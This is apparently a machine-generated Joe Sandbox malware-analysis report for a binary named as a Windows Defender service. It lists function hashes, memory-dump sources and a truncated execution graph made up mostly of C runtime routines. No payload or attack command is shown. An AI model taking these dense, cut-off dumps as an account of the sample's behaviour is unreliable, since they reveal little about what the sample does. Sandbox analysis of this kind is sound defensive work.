                                                                                                      • Instruction Fuzzy Hash: 09418362B18A41C1DB149F25F4443BDA7A1FB84794F804131DE4D87B98DF3CD445D764
                                                                                                      Function 00007FF76E181F30 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 82COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: __std_exception_copy_invalid_parameter_noinfo_noreturn
                                                                                                      • String ID: ios_base::failbit set
                                                                                                      • API String ID: 1109970293-3924258884
                                                                                                      • Opcode ID: ad205b503376cc66794e463eec2ea4e0d7f3e8de40c10478924d38c4c25f27c2
                                                                                                      • Instruction ID: ad95344092209cf65c9689bac5537161604d27f60b648f20554d73b579dde033
                                                                                                      • Opcode Fuzzy Hash: ad205b503376cc66794e463eec2ea4e0d7f3e8de40c10478924d38c4c25f27c2
                                                                                                      • Instruction Fuzzy Hash: 0E21E962E18BC5C1E7049B24F4411BAA360FF597A0F54A331EAAC127D5EF2CD5D4C324
                                                                                                      Function 00007FF76E18DF40 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 81COMMON
                                                                                                      Download Yara Rule
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID:
                                                                                                      • String ID: ios_base::failbit set
                                                                                                      • API String ID: 0-3924258884
                                                                                                      • Opcode ID: fcec7a1fe12a37619028288773bb44af9363bc22db796437b84b984bbf840e31
                                                                                                      • Instruction ID: 2ed8e5abecbdfbbd70f3bfc0c17bbe7501988ef262b6462a1828c7e6f6229d39
                                                                                                      • Opcode Fuzzy Hash: fcec7a1fe12a37619028288773bb44af9363bc22db796437b84b984bbf840e31
                                                                                                      • Instruction Fuzzy Hash: 75213B52B09742C5EA187B11B4003BAA1449B047E4F940731DE7D077C2DE3CA582B335
                                                                                                      Function 00007FF76E192494 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMONLIBRARYCODE
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: ExceptionFileHeaderRaise
                                                                                                      • String ID: csm
                                                                                                      • API String ID: 2573137834-1018135373
                                                                                                      • Opcode ID: 03fb329d4361a2ddeb27f03ccd46364298fd356b6db149a3cdc49d9177b62aae
                                                                                                      • Instruction ID: c2cc1af041719a4114c2a0f9e077359cc92fe599d9f7384e1d5a73c515403979
                                                                                                      • Opcode Fuzzy Hash: 03fb329d4361a2ddeb27f03ccd46364298fd356b6db149a3cdc49d9177b62aae
                                                                                                      • Instruction Fuzzy Hash: EA111C32618B41C2EB259B15F444269B7E5FB88B84F984231DE8C07B58DF3CD951DB14
                                                                                                      Function 00007FF76E181580 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                                                      Download Yara Rule
                                                                                                      APIs
                                                                                                      Strings
                                                                                                      Memory Dump Source
                                                                                                      • Source File: 00000005.00000002.2169025101.00007FF76E181000.00000040.00000001.01000000.00000006.sdmp, Offset: 00007FF76E180000, based on PE: true
                                                                                                      • Associated: 00000005.00000002.2169012338.00007FF76E180000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1C9000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169025101.00007FF76E1D1000.00000040.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169084411.00007FF76E1D2000.00000080.00000001.01000000.00000006.sdmpDownload File
                                                                                                      • Associated: 00000005.00000002.2169098908.00007FF76E1D3000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                      Joe Sandbox IDA Plugin
                                                                                                      • Snapshot File: hcaresult_5_2_7ff76e180000_MicrosoftWindowsDefenderCoreService.jbxd
                                                                                                      Similarity
                                                                                                      • API ID: Xinvalid_argument__std_exception_copystd::_
                                                                                                      • String ID: string too long
                                                                                                      • API String ID: 2536225881-2556327735
                                                                                                      • Opcode ID: 19607974dd3a492329af1dcf59571df2ac1afc7934e5d7e8f422ccd63231f6ad
                                                                                                      • Instruction ID: a2e479c3760d67d4474b8b6de417dab8403e709017c8158f17af7d1470b931c4
                                                                                                      • Opcode Fuzzy Hash: 19607974dd3a492329af1dcf59571df2ac1afc7934e5d7e8f422ccd63231f6ad
                                                                                                      • Instruction Fuzzy Hash: E5E06D61A14B49D1EB09BF21F8800B8B3A1EF68B00BD49232D95C46361EE2CE1E5D324

                                                                                                      Execution Graph

                                                                                                      Execution Coverage:7.4%
                                                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                                                      Signature Coverage:0%
                                                                                                      Total number of Nodes:1637
                                                                                                      Total number of Limit Nodes:9
                                                                                                      execution_graph 7111 7ff7aa95553c 7123 7ff7aa95546f __CxxCallCatchBlock __FrameHandler3::GetHandlerSearchState 7111->7123 7112 7ff7aa955563 7113 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7112->7113 7115 7ff7aa955568 7113->7115 7114 7ff7aa95559e 7116 7ff7aa957df4 _CreateFrameInfo 34 API calls 7114->7116 7117 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7115->7117 7118 7ff7aa955573 7115->7118 7116->7118 7117->7118 7119 7ff7aa955580 __FrameHandler3::GetHandlerSearchState 7118->7119 7120 7ff7aa957df4 _CreateFrameInfo 34 API calls 7118->7120 7121 7ff7aa9555a9 7120->7121 7122 7ff7aa953a50 38 API calls Is_bad_exception_allowed 7122->7123 7123->7112 7123->7114 7123->7122 7125 7ff7aa953a78 7123->7125 7126 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7125->7126 7127 7ff7aa953a86 7126->7127 7127->7123 6886 7ff7aa95abc0 6887 7ff7aa95abd0 6886->6887 6894 7ff7aa95a770 6887->6894 6889 7ff7aa95abd9 6890 7ff7aa95abe7 6889->6890 6902 7ff7aa95a9bc GetStartupInfoW 6889->6902 6895 7ff7aa95a78f 6894->6895 6899 7ff7aa95a7b8 6894->6899 6896 7ff7aa958284 _set_fmode 7 API calls 6895->6896 6897 7ff7aa95a794 6896->6897 6898 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 6897->6898 6901 7ff7aa95a7a0 6898->6901 6899->6901 6913 7ff7aa95a678 6899->6913 6901->6889 6903 7ff7aa95aa8b 6902->6903 6904 7ff7aa95a9f1 6902->6904 6908 7ff7aa95aaac 6903->6908 6904->6903 6905 7ff7aa95a770 37 API calls 6904->6905 6906 7ff7aa95aa1a 6905->6906 6906->6903 6907 7ff7aa95aa44 GetFileType 6906->6907 6907->6906 6909 7ff7aa95aaca 6908->6909 6910 7ff7aa95ab25 GetStdHandle 6909->6910 6911 7ff7aa95ab99 6909->6911 6910->6909 6912 7ff7aa95ab38 GetFileType 6910->6912 6911->6890 6912->6909 6914 7ff7aa958ac4 _set_fmode 7 API calls 6913->6914 6915 7ff7aa95a699 6914->6915 6916 7ff7aa95a6fb 6915->6916 6920 7ff7aa95b708 6915->6920 6917 7ff7aa958b3c __free_lconv_mon 7 API calls 6916->6917 6918 7ff7aa95a705 6917->6918 6918->6899 6921 7ff7aa95b490 2 API calls 6920->6921 6922 7ff7aa95b73e 6921->6922 6923 7ff7aa95b75d InitializeCriticalSectionAndSpinCount 6922->6923 6924 7ff7aa95b743 6922->6924 6923->6924 6924->6915 6925 7ff7aa9607c0 6928 7ff7aa956d50 6925->6928 6927 7ff7aa9607d6 6929 7ff7aa958878 _set_fmode 7 API calls 6928->6929 6930 7ff7aa956d6e 6929->6930 6930->6927 7363 7ff7aa95fcc0 7373 7ff7aa953dfc 7363->7373 7365 7ff7aa95fce8 7367 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7368 7ff7aa95fcf8 7367->7368 7369 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7368->7369 7370 7ff7aa95fd01 7369->7370 7371 7ff7aa957dc8 34 API calls 7370->7371 7372 7ff7aa95fd0a 7371->7372 7376 7ff7aa953e2c __CxxCallCatchBlock _IsNonwritableInCurrentImage __except_validate_context_record 7373->7376 7374 7ff7aa953f2d 7374->7365 7374->7367 7375 7ff7aa953ef0 RtlUnwindEx 7375->7376 7376->7374 7376->7375 7887 7ff7aa95fc40 7888 7ff7aa95fc78 __GSHandlerCheckCommon 7887->7888 7889 7ff7aa95fca4 7888->7889 7891 7ff7aa953aa8 7888->7891 7892 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7891->7892 7893 7ff7aa953ad2 7892->7893 7894 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7893->7894 7895 7ff7aa953adf 7894->7895 7896 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7895->7896 7897 7ff7aa953ae8 7896->7897 7897->7889 6931 7ff7aa9527c0 6938 7ff7aa953194 SetUnhandledExceptionFilter 6931->6938 6942 7ff7aa95a3d0 GetCommandLineA GetCommandLineW 7134 7ff7aa95c150 7135 7ff7aa95c17a 7134->7135 7136 7ff7aa958ac4 _set_fmode 7 API calls 7135->7136 7137 7ff7aa95c199 7136->7137 7138 7ff7aa958b3c __free_lconv_mon 7 API calls 7137->7138 7139 7ff7aa95c1a7 7138->7139 7140 7ff7aa958ac4 _set_fmode 7 API calls 7139->7140 7144 7ff7aa95c1d1 7139->7144 7141 7ff7aa95c1c3 7140->7141 7143 7ff7aa958b3c __free_lconv_mon 7 API calls 7141->7143 7142 7ff7aa95b708 3 API calls 7142->7144 7143->7144 7144->7142 7145 7ff7aa95c1da 7144->7145 7377 7ff7aa958e9c 7378 7ff7aa958ec1 7377->7378 7386 7ff7aa958ed8 7377->7386 7379 7ff7aa958284 _set_fmode 7 API calls 7378->7379 7380 7ff7aa958ec6 7379->7380 7382 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7380->7382 7381 7ff7aa958f90 7427 7ff7aa957138 7381->7427 7403 7ff7aa958ed1 7382->7403 7385 7ff7aa958ff0 7389 7ff7aa958b3c __free_lconv_mon 7 API calls 7385->7389 7386->7381 7392 7ff7aa958f68 7386->7392 7399 7ff7aa958f25 7386->7399 7409 7ff7aa9590e0 7386->7409 7388 7ff7aa959081 7390 7ff7aa958b3c __free_lconv_mon 7 API calls 7388->7390 7391 7ff7aa958ff7 7389->7391 7393 7ff7aa95908c 7390->7393 7395 7ff7aa958b3c __free_lconv_mon 7 API calls 7391->7395 7404 7ff7aa958f48 7391->7404 7396 7ff7aa958b3c __free_lconv_mon 7 API calls 7392->7396 7392->7404 7397 7ff7aa9590a5 7393->7397 7401 7ff7aa958b3c __free_lconv_mon 7 API calls 7393->7401 7394 7ff7aa958b3c __free_lconv_mon 7 API calls 7394->7399 7395->7391 7396->7392 7402 7ff7aa958b3c __free_lconv_mon 7 API calls 7397->7402 7398 7ff7aa958b3c __free_lconv_mon 7 API calls 7398->7403 7399->7394 7399->7404 7401->7393 7402->7403 7404->7398 7405 7ff7aa9590c7 7407 7ff7aa956c80 _invalid_parameter_noinfo_noreturn 12 API calls 7405->7407 7406 7ff7aa959022 7406->7388 7406->7405 7433 7ff7aa95c8a0 7406->7433 7408 7ff7aa9590dc 7407->7408 7410 7ff7aa95910e 7409->7410 7410->7410 7411 7ff7aa958ac4 _set_fmode 7 API calls 7410->7411 7412 7ff7aa959159 7411->7412 7413 7ff7aa95c8a0 34 API calls 7412->7413 7414 7ff7aa95918f 7413->7414 7415 7ff7aa956c80 _invalid_parameter_noinfo_noreturn 12 API calls 7414->7415 7416 7ff7aa959263 7415->7416 7417 7ff7aa958114 34 API calls 7416->7417 7418 7ff7aa959346 7417->7418 7442 7ff7aa958b94 7418->7442 7421 7ff7aa95940d 7422 7ff7aa958114 34 API calls 7421->7422 7423 7ff7aa95943d 7422->7423 7463 7ff7aa958d10 7423->7463 7426 7ff7aa9590e0 37 API calls 7428 7ff7aa957150 7427->7428 7432 7ff7aa957188 7427->7432 7429 7ff7aa958ac4 _set_fmode 7 API calls 7428->7429 7428->7432 7430 7ff7aa95717e 7429->7430 7431 7ff7aa958b3c __free_lconv_mon 7 API calls 7430->7431 7431->7432 7432->7385 7432->7406 7438 7ff7aa95c8bd 7433->7438 7434 7ff7aa95c8c2 7435 7ff7aa95c8d8 7434->7435 7436 7ff7aa958284 _set_fmode 7 API calls 7434->7436 7435->7406 7437 7ff7aa95c8cc 7436->7437 7439 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7437->7439 7438->7434 7438->7435 7440 7ff7aa95c90c 7438->7440 7439->7435 7440->7435 7441 7ff7aa958284 _set_fmode 7 API calls 7440->7441 7441->7437 7443 7ff7aa958bbe 7442->7443 7444 7ff7aa958be2 7442->7444 7448 7ff7aa958b3c __free_lconv_mon 7 API calls 7443->7448 7453 7ff7aa958bcd FindFirstFileExW 7443->7453 7445 7ff7aa958c3c 7444->7445 7446 7ff7aa958be7 7444->7446 7447 7ff7aa95a3f8 MultiByteToWideChar 7445->7447 7449 7ff7aa958bfc 7446->7449 7450 7ff7aa958b3c __free_lconv_mon 7 API calls 7446->7450 7446->7453 7455 7ff7aa958c58 7447->7455 7448->7453 7451 7ff7aa958a64 8 API calls 7449->7451 7450->7449 7451->7453 7452 7ff7aa958c5f __vcrt_InitializeCriticalSectionEx 7452->7453 7484 7ff7aa9581f8 7452->7484 7453->7421 7454 7ff7aa958c9a 7454->7453 7457 7ff7aa95a3f8 MultiByteToWideChar 7454->7457 7455->7452 7455->7454 7456 7ff7aa958c8d 7455->7456 7458 7ff7aa958b3c __free_lconv_mon 7 API calls 7455->7458 7459 7ff7aa958a64 8 API calls 7456->7459 7457->7452 7458->7456 7459->7454 7462 7ff7aa958284 _set_fmode 7 API calls 7462->7453 7464 7ff7aa958d5e 7463->7464 7465 7ff7aa958d3a 7463->7465 7466 7ff7aa958db8 7464->7466 7467 7ff7aa958d64 7464->7467 7469 7ff7aa958b3c __free_lconv_mon 7 API calls 7465->7469 7472 7ff7aa958d49 7465->7472 7468 7ff7aa95a488 WideCharToMultiByte 7466->7468 7470 7ff7aa958d79 7467->7470 7467->7472 7473 7ff7aa958b3c __free_lconv_mon 7 API calls 7467->7473 7477 7ff7aa958ddc 7468->7477 7469->7472 7474 7ff7aa958a64 8 API calls 7470->7474 7471 7ff7aa958de3 __vcrt_InitializeCriticalSectionEx 7471->7472 7479 7ff7aa9581f8 7 API calls 7471->7479 7472->7426 7473->7470 7474->7472 7475 7ff7aa958e20 7475->7472 7476 7ff7aa95a488 WideCharToMultiByte 7475->7476 7476->7471 7477->7471 7477->7475 7478 7ff7aa958e14 7477->7478 7480 7ff7aa958b3c __free_lconv_mon 7 API calls 7477->7480 7481 7ff7aa958a64 8 API calls 7478->7481 7482 7ff7aa958df0 7479->7482 7480->7478 7481->7475 7483 7ff7aa958284 _set_fmode 7 API calls 7482->7483 7483->7472 7485 7ff7aa958878 _set_fmode 7 API calls 7484->7485 7486 7ff7aa958205 __free_lconv_mon 7485->7486 7487 7ff7aa958878 _set_fmode 7 API calls 7486->7487 7488 7ff7aa958227 7487->7488 7488->7462 7489 7ff7aa96089e 7490 7ff7aa9608b6 7489->7490 7496 7ff7aa960921 7489->7496 7491 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7490->7491 7490->7496 7492 7ff7aa960903 7491->7492 7493 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7492->7493 7494 7ff7aa960918 7493->7494 7495 7ff7aa957dc8 34 API calls 7494->7495 7495->7496 7149 7ff7aa957320 7150 7ff7aa957339 7149->7150 7151 7ff7aa957335 7149->7151 7152 7ff7aa95a000 51 API calls 7150->7152 7153 7ff7aa95733e 7152->7153 7164 7ff7aa95a568 GetEnvironmentStringsW 7153->7164 7156 7ff7aa95734b 7159 7ff7aa958b3c __free_lconv_mon 7 API calls 7156->7159 7157 7ff7aa957357 7184 7ff7aa957394 7157->7184 7159->7151 7161 7ff7aa958b3c __free_lconv_mon 7 API calls 7162 7ff7aa95737e 7161->7162 7163 7ff7aa958b3c __free_lconv_mon 7 API calls 7162->7163 7163->7151 7165 7ff7aa957343 7164->7165 7166 7ff7aa95a598 7164->7166 7165->7156 7165->7157 7167 7ff7aa95a488 WideCharToMultiByte 7166->7167 7168 7ff7aa95a5e9 7167->7168 7169 7ff7aa95a5f0 FreeEnvironmentStringsW 7168->7169 7170 7ff7aa958a64 8 API calls 7168->7170 7169->7165 7171 7ff7aa95a603 7170->7171 7172 7ff7aa95a60b 7171->7172 7173 7ff7aa95a614 7171->7173 7174 7ff7aa958b3c __free_lconv_mon 7 API calls 7172->7174 7175 7ff7aa95a488 WideCharToMultiByte 7173->7175 7176 7ff7aa95a612 7174->7176 7177 7ff7aa95a637 7175->7177 7176->7169 7178 7ff7aa95a63b 7177->7178 7179 7ff7aa95a645 7177->7179 7180 7ff7aa958b3c __free_lconv_mon 7 API calls 7178->7180 7181 7ff7aa958b3c __free_lconv_mon 7 API calls 7179->7181 7182 7ff7aa95a643 FreeEnvironmentStringsW 7180->7182 7181->7182 7182->7165 7185 7ff7aa9573b9 7184->7185 7186 7ff7aa958ac4 _set_fmode 7 API calls 7185->7186 7195 7ff7aa9573ef 7186->7195 7187 7ff7aa958b3c __free_lconv_mon 7 API calls 7188 7ff7aa95735f 7187->7188 7188->7161 7189 7ff7aa95746a 7190 7ff7aa958b3c __free_lconv_mon 7 API calls 7189->7190 7190->7188 7191 7ff7aa958ac4 _set_fmode 7 API calls 7191->7195 7192 7ff7aa957459 7203 7ff7aa9574a4 7192->7203 7193 7ff7aa957e4c __std_exception_copy 34 API calls 7193->7195 7195->7189 7195->7191 7195->7192 7195->7193 7197 7ff7aa95748f 7195->7197 7200 7ff7aa958b3c __free_lconv_mon 7 API calls 7195->7200 7201 7ff7aa9573f7 7195->7201 7199 7ff7aa956c80 _invalid_parameter_noinfo_noreturn 12 API calls 7197->7199 7198 7ff7aa958b3c __free_lconv_mon 7 API calls 7198->7201 7202 7ff7aa9574a2 7199->7202 7200->7195 7201->7187 7204 7ff7aa9574a9 7203->7204 7205 7ff7aa957461 7203->7205 7206 7ff7aa9574d2 7204->7206 7207 7ff7aa958b3c __free_lconv_mon 7 API calls 7204->7207 7205->7198 7208 7ff7aa958b3c __free_lconv_mon 7 API calls 7206->7208 7207->7204 7208->7205 7209 7ff7aa957d20 7210 7ff7aa958b3c __free_lconv_mon 7 API calls 7209->7210 7211 7ff7aa957d30 7210->7211 7212 7ff7aa958b3c __free_lconv_mon 7 API calls 7211->7212 7213 7ff7aa957d44 7212->7213 7214 7ff7aa958b3c __free_lconv_mon 7 API calls 7213->7214 7215 7ff7aa957d58 7214->7215 7216 7ff7aa958b3c __free_lconv_mon 7 API calls 7215->7216 7217 7ff7aa957d6c 7216->7217 7497 7ff7aa9552aa 7498 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7497->7498 7500 7ff7aa9552b7 __CxxCallCatchBlock 7498->7500 7499 7ff7aa9552fb RaiseException 7501 7ff7aa955322 7499->7501 7500->7499 7502 7ff7aa9539fc __CxxCallCatchBlock 38 API calls 7501->7502 7507 7ff7aa95532a 7502->7507 7503 7ff7aa955353 __CxxCallCatchBlock 7504 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7503->7504 7505 7ff7aa955366 7504->7505 7506 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7505->7506 7508 7ff7aa95536f 7506->7508 7507->7503 7509 7ff7aa953c64 __CxxCallCatchBlock 38 API calls 7507->7509 7509->7503 7218 7ff7aa960934 7221 7ff7aa95539c 7218->7221 7222 7ff7aa955403 7221->7222 7223 7ff7aa9553b6 7221->7223 7223->7222 7224 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7223->7224 7224->7222 6946 7ff7aa9531b0 6947 7ff7aa9531c8 6946->6947 6948 7ff7aa9531e4 6946->6948 6947->6948 6955 7ff7aa953d20 6947->6955 6953 7ff7aa957dc8 34 API calls 6954 7ff7aa95320a 6953->6954 6961 7ff7aa9540a0 6955->6961 6958 7ff7aa953d34 6959 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6958->6959 6960 7ff7aa953202 6959->6960 6960->6953 6967 7ff7aa9540bc 6961->6967 6964 7ff7aa9531f6 6964->6958 6965 7ff7aa957df4 _CreateFrameInfo 34 API calls 6966 7ff7aa9540b8 6965->6966 6968 7ff7aa9540a9 6967->6968 6970 7ff7aa9540db __vcrt_InitializeCriticalSectionEx 6967->6970 6968->6964 6968->6965 6969 7ff7aa954160 SetLastError 6969->6968 6970->6969 6976 7ff7aa9540fe __std_exception_destroy 6970->6976 6977 7ff7aa955b24 6970->6977 6972 7ff7aa95410e 6972->6969 6973 7ff7aa954135 6972->6973 6975 7ff7aa955b24 _CreateFrameInfo 3 API calls 6972->6975 6974 7ff7aa955b24 _CreateFrameInfo 3 API calls 6973->6974 6973->6976 6974->6976 6975->6973 6976->6969 6982 7ff7aa9558fc 6977->6982 6979 7ff7aa955b52 6980 7ff7aa955b64 TlsSetValue 6979->6980 6981 7ff7aa955b5c 6979->6981 6980->6981 6981->6972 6984 7ff7aa9559e6 __vcrt_InitializeCriticalSectionEx 6982->6984 6985 7ff7aa955940 __vcrt_InitializeCriticalSectionEx 6982->6985 6983 7ff7aa95596e LoadLibraryExW 6983->6984 6983->6985 6984->6979 6985->6983 6985->6984 6986 7ff7aa9559b1 LoadLibraryExW 6985->6986 6986->6984 6986->6985 6987 7ff7aa9551b0 6988 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6987->6988 6989 7ff7aa9551e5 6988->6989 6990 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6989->6990 6991 7ff7aa9551f3 __except_validate_context_record 6990->6991 6992 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6991->6992 6993 7ff7aa955237 6992->6993 6994 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6993->6994 6995 7ff7aa955240 6994->6995 6996 7ff7aa9540a0 _CreateFrameInfo 38 API calls 6995->6996 6997 7ff7aa955249 6996->6997 7010 7ff7aa9539c0 6997->7010 7000 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7001 7ff7aa955279 __CxxCallCatchBlock 7000->7001 7017 7ff7aa9539fc 7001->7017 7003 7ff7aa955353 __CxxCallCatchBlock 7004 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7003->7004 7005 7ff7aa955366 7004->7005 7006 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7005->7006 7008 7ff7aa95536f 7006->7008 7011 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7010->7011 7012 7ff7aa9539d1 7011->7012 7013 7ff7aa9539dc 7012->7013 7014 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7012->7014 7015 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7013->7015 7014->7013 7016 7ff7aa9539ed 7015->7016 7016->7000 7016->7001 7018 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7017->7018 7019 7ff7aa953a0e 7018->7019 7020 7ff7aa953a49 7019->7020 7022 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7019->7022 7021 7ff7aa957df4 _CreateFrameInfo 34 API calls 7020->7021 7023 7ff7aa953a4e 7021->7023 7024 7ff7aa953a19 7022->7024 7024->7020 7025 7ff7aa953a35 7024->7025 7026 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7025->7026 7027 7ff7aa953a3a 7026->7027 7027->7003 7028 7ff7aa953c64 7027->7028 7029 7ff7aa9540a0 _CreateFrameInfo 38 API calls 7028->7029 7030 7ff7aa953c72 7029->7030 7030->7003 7225 7ff7aa957730 7228 7ff7aa9576a8 7225->7228 7227 7ff7aa957759 7229 7ff7aa9576c6 7228->7229 7230 7ff7aa9576ff 7229->7230 7231 7ff7aa95b428 7 API calls 7229->7231 7230->7227 7231->7229 7031 7ff7aa95cdf8 7032 7ff7aa95ce00 7031->7032 7033 7ff7aa95ce15 7032->7033 7035 7ff7aa95ce2e 7032->7035 7034 7ff7aa958284 _set_fmode 7 API calls 7033->7034 7036 7ff7aa95ce1a 7034->7036 7038 7ff7aa958114 34 API calls 7035->7038 7039 7ff7aa95ce25 7035->7039 7037 7ff7aa956c30 _invalid_parameter_noinfo 34 API calls 7036->7037 7037->7039 7038->7039 7510 7ff7aa952904 7511 7ff7aa953140 GetModuleHandleW 7510->7511 7512 7ff7aa95290b _CreateFrameInfo 7511->7512 7513 7ff7aa95290f 7512->7513 7514 7ff7aa952e74 4 API calls 7512->7514 7515 7ff7aa952959 7514->7515 7040 7ff7aa95ac00 7041 7ff7aa95ac0c 7040->7041 7043 7ff7aa95ac33 7041->7043 7044 7ff7aa95a720 7041->7044 7045 7ff7aa95a725 7044->7045 7046 7ff7aa95a760 7044->7046 7047 7ff7aa95a758 7045->7047 7048 7ff7aa95a746 RtlDeleteCriticalSection 7045->7048 7046->7041 7049 7ff7aa958b3c __free_lconv_mon 7 API calls 7047->7049 7048->7047 7048->7048 7049->7046 7050 7ff7aa958a00 7051 7ff7aa958a10 7050->7051 7052 7ff7aa958878 _set_fmode 7 API calls 7051->7052 7053 7ff7aa958a1b __vcrt_uninitialize_ptd 7051->7053 7052->7053 7232 7ff7aa95ef80 7233 7ff7aa95ef97 7232->7233 7234 7ff7aa95ef91 CloseHandle 7232->7234 7234->7233 7235 7ff7aa958580 7236 7ff7aa958585 7235->7236 7237 7ff7aa95859a 7235->7237 7241 7ff7aa9585a0 7236->7241 7240 7ff7aa958b3c __free_lconv_mon 7 API calls 7240->7237 7242 7ff7aa9585ea 7241->7242 7243 7ff7aa9585e2 7241->7243 7244 7ff7aa958b3c __free_lconv_mon 7 API calls 7242->7244 7245 7ff7aa958b3c __free_lconv_mon 7 API calls 7243->7245 7246 7ff7aa9585f7 7244->7246 7245->7242 7247 7ff7aa958b3c __free_lconv_mon 7 API calls 7246->7247 7248 7ff7aa958604 7247->7248 7249 7ff7aa958b3c __free_lconv_mon 7 API calls 7248->7249 7250 7ff7aa958611 7249->7250 7251 7ff7aa958b3c __free_lconv_mon 7 API calls 7250->7251 7252 7ff7aa95861e 7251->7252 7253 7ff7aa958b3c __free_lconv_mon 7 API calls 7252->7253 7254 7ff7aa95862b 7253->7254 7255 7ff7aa958b3c __free_lconv_mon 7 API calls 7254->7255 7256 7ff7aa958638 7255->7256 7257 7ff7aa958b3c __free_lconv_mon 7 API calls 7256->7257 7258 7ff7aa958645 7257->7258 7259 7ff7aa958b3c __free_lconv_mon 7 API calls 7258->7259 7260 7ff7aa958655 7259->7260 7261 7ff7aa958b3c __free_lconv_mon 7 API calls 7260->7261 7262 7ff7aa958665 7261->7262 7267 7ff7aa958444 7262->7267 7264 7ff7aa95867a 7271 7ff7aa9583bc 7264->7271 7266 7ff7aa958592 7266->7240 7269 7ff7aa958460 7267->7269 7268 7ff7aa958490 7268->7264 7269->7268 7270 7ff7aa958b3c __free_lconv_mon 7 API calls 7269->7270 7270->7268 7272 7ff7aa9583d8 7271->7272 7273 7ff7aa958698 